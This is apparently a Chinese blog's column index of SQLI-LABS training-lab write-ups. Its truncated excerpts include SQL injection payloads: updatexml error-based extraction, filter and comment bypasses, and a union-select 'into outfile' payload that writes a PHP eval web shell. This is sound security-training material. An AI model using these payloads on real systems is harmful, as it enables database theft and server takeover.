SQLI-LABS
文章平均质量分 75
执昔
这个作者很懒,什么都没留下…
展开
-
SQL 文件导入导出操作
1.允许用户对mysql的导入导出操作有权限 PhpMyadmin 中可查看,变量-- secure-file-priv 参数 参数情况: secure-file-priv= 不对mysql的导入导出操作做出限制 secure-file-priv='c:/a/' 限制mysql的导入与导出操作限制在指定目录 c:/a/ 下 secure-file-priv=null 不允许导入导出操作 2.文件导入导出 的权限查看 3.知道写入目标文件的 绝对路径 读取文件操作:load_file('所要读取文原创 2021-03-14 00:20:17 · 437 阅读 · 0 评论 -
SQLI-LABS (九)(50~65)
SQLI-LABS (九) 文章目录SQLI-LABS (九)Less-50:Less-51:Less-52:Less-53:Less-54:Less-55:Less-56:Less-57:Less-58:Less-59:Less-60:Less-61:Less-62:Less-63:Less-64:Less-65: Less-50: 有报错,整型注入,可 报错注入 ,也可 堆叠注入 ?sort=1 and updatexml(1,concat(0x5e,database(),0x5e),1)--+ Le原创 2021-03-14 00:18:29 · 152 阅读 · 0 评论 -
SQLI-LABS (七) (26~31)
SQLI-LABS (七) 文章目录SQLI-LABS (七)过滤Less-26:对于注释符的过滤--使用;%00 , 或者是 手动闭合对于 and 与 or 的过滤--使用双鞋绕过 或者是 &&-->%26%26 和 ||-->%7c%7c(转换为URL编码)对于空格的过滤方法一:使用括号包围方法二:使用字符编码进行绕过空格Less-26a:布尔盲注Less-27:Less-27a:Less-28:Less-28a:Less-29:联合查询Less-30:Less-31 过滤原创 2021-03-13 23:16:02 · 126 阅读 · 0 评论 -
SQLI-LABS (八)(32~49)
SQLI-LABS (八) WAF 绕过 Less–32: 为了防止 SQL注入漏洞,通常在源代码当中会对我们所输入的 SQL查询语句进行一个转义,一般是对 单引号,双引号 进行一个转义变成 ’ 或者是 " ,这样Mysql在 执行 SQL语句时,不会影响到查询,即不会出现报错,也就预防了 SQL注入。 宽字节注入 ...原创 2021-03-13 21:56:24 · 202 阅读 · 0 评论 -
SQLI-LABS (六) (18~25a)
SQLI-LABS (六) 文章目录SQLI-LABS (六)过滤Less-23方法一:;%00截断方法二:手动闭合 '1'='1Less-24二次注入Less-25双写绕过Less-25a双写绕过Less-26 过滤 Less-23 将 注释符 进行了过滤 有报错,有回显 闭合方式为 ’ 方法一:;%00截断 查库: ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1);%00 查表: ?id=1' and updatexml(1,concat(原创 2021-02-07 21:18:19 · 140 阅读 · 0 评论 -
SQLI-LABS(五)(11~17)
SQLI-LABS(五) 文章目录SQLI-LABS(五)Less-11:联合查询报错注入Less-12:Less-13:报错注入Less-14:报错注入Less-15:延时注入Less-16:延时注入Less-17:报错注入 Less-11: Dumb Dumb Dumb' Dumb 我们抓包在Burp的Repeater模块中进行 order by 查出有两列 有回显,有报错 闭合方式为 ’ 联合查询 后面的查询不再演示 报错注入 后面的查询不再演示 Less-12: 有回显,有报错原创 2021-01-27 16:31:11 · 248 阅读 · 0 评论 -
SQLI-LABS(四)(7~10)
SQLI-LABS(四) 文章目录SQLI-LABS(四)Less-7:写入文件操作Less-8:布尔盲注Less-9:延时注入Less-10 Less-7: ?id=1')) --+ 没有回显,没有报错 字符型注入,闭合方式为 ')) order by 检测为三列 写入文件操作 可写入一句话木马: 示例一: ?id=-1')) union select 1,"<?php @eval(\$_POST[111]); ?>",3 into outfile "D:\\phpstudy_pro\原创 2021-01-27 14:58:37 · 233 阅读 · 0 评论 -
SQLI-LABS(三)(5~6)
SQLI-LABS(三) 文章目录SQLI-LABS(三)Less-5:方法一:报错注入XPATH报错方法二:判断是否为布尔类型注入布尔盲注---对可变参数进行爆破处理Less-6: 准备的函数: left(a,b); 从左侧开始截取a的前b位 length(a); 返回字符串a的长度 regexp(); like(); substr(a,b,c); 从b位开始截取字符串a的c位 ascii('a'); 返回字母 a 的 ascii值 ord(); chr(); if(a,b,c);原创 2021-01-19 23:33:33 · 273 阅读 · 0 评论 -
SQLI-LABS(二)(1~4)
SQLI-LABS(二) 前三关流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一关文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; 第一关: 1、判断:?id=1’ 2、列数:?id=1’ order by x–+ (其中x输入数字代表哪一列,是用二分法缩小范围,x之后是两个减号与加号,代表注原创 2020-11-24 17:17:01 · 361 阅读 · 1 评论 -
SQLI-LABS(一)
SQLI-LABS (一) 学习前的准备: sql是什么? sql注入:在web应用程序事先定义好的查询语句结尾添加额外SQL语句, 欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息,进行提权等; 2、搭建sqli-labs(可以使用phpstudy搭建); 3、学会在 mysql命令行 中进行 mysql的基本用法 ; mysql命令行的具体打开方法:找到\phpstudy_pro\extensions\mysql5.7.26\bin ,在Windows命令中进入bin中,输入"mysql -u原创 2020-11-23 23:51:24 · 1356 阅读 · 0 评论